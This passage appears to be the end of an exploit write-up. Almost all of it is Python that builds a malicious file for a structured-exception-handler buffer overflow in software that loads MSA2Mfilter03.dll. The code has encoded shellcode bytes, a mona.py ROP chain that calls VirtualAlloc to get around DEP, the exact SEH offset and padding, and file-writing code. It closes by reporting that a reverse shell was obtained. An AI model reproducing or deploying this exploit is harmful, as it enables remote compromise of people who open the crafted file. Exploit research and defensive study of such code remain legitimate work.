shellcode += b"\xf5\x63\x6a\x15\xf4\xe6\xd6\x31\xe6\x3e\xd6"
shellcode += b"\x7d\x52\xef\x81\x2b\x0c\x49\x78\x9a\xe6\x03"
shellcode += b"\xd7\x74\x6e\xd5\x1b\x47\xe8\xda\x71\x31\x14"
shellcode += b"\x6a\x2c\x04\x2b\x43\xb8\x80\x54\xb9\x58\x6e"
shellcode += b"\x8f\x79\x78\x8d\x05\x74\x11\x08\xcc\x35\x7c"
shellcode += b"\xab\x3b\x79\x79\x28\xc9\x02\x7e\x30\xb8\x07"
shellcode += b"\x3a\xf6\x51\x7a\x53\x93\x55\x29\x54\xb6"


def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        #[---INFO:gadgets_to_set_ebp:---]
        0x100501df, # POP EBP # RETN [MSA2Mfilter03.dll]
        0x100501df, # skip 4 bytes [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edx:---]
        0x100319c0, # POP EDX # RETN
        0x80808080, # First value to be added
        0x1001505a, # POP EBX # RETN
        0x7f7f8f80, # Second value to be added
        0x10029f3e, # ADD EDX,EBX # POP EBX # RETN 0x10
        0xdeadbeaf,
        0x10018487, # POP ECX # RETN [MSA2Mfilter03.dll]
        0x41414141,
        0x41414141,
        0x41414141,
        0x41414141,
        # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx
        #[---INFO:gadgets_to_set_ecx:---]
        0xffffffff, #
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        0x10031d7e, # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_ebx:---]
        0x1001505a, # POP EBX # RETN [MSA2Mfilter03.dll]
        0xffffffff, #
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        0x100319d3, # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_edi:---]
        0x100290a8, # POP EDI # RETN [MSA2Mfilter03.dll]
        0x1002a602, # RETN (ROP NOP) [MSA2Mfilter03.dll]
        #[---INFO:gadgets_to_set_esi:---]
        0x100217e1, # POP ESI # RETN [MSA2Mfilter03.dll]
        0x1002ab52, # JMP [EAX] [MSA2Mfilter03.dll]
        0x1002ca2d, # POP EAX # RETN [MSA2Mfilter03.dll]
        0x1005d060, # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
        #[---INFO:pushad:---]
        0x10014720, # PUSHAD # RETN [MSA2Mfilter03.dll]
        #[---INFO:extras:---]
        0x100371f5, # ptr to 'call esp' [MSA2Mfilter03.dll]
    ]
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()



junk1 = b"A" * 43474  # seh offset
#seh = b'\xcc\xcc\xcc\xcc'
seh = struct.pack('<I', 0x1001f35f)  # ADD ESP,19000 # RETN
nops1 = b'\x90' * (58760 + 32 - 1368)  # pads so ESP lands on the chain's first gadget
nops2 = b'\x90' * 32
junk2 = b"C" * 1000
payload = junk1 + seh + nops1 + rop_chain + nops2 + shellcode + junk2
with open(filename, "wb") as filehandle:
    filehandle.write(payload)
```

A reverse shell was obtained successfully.

[screenshot: seh]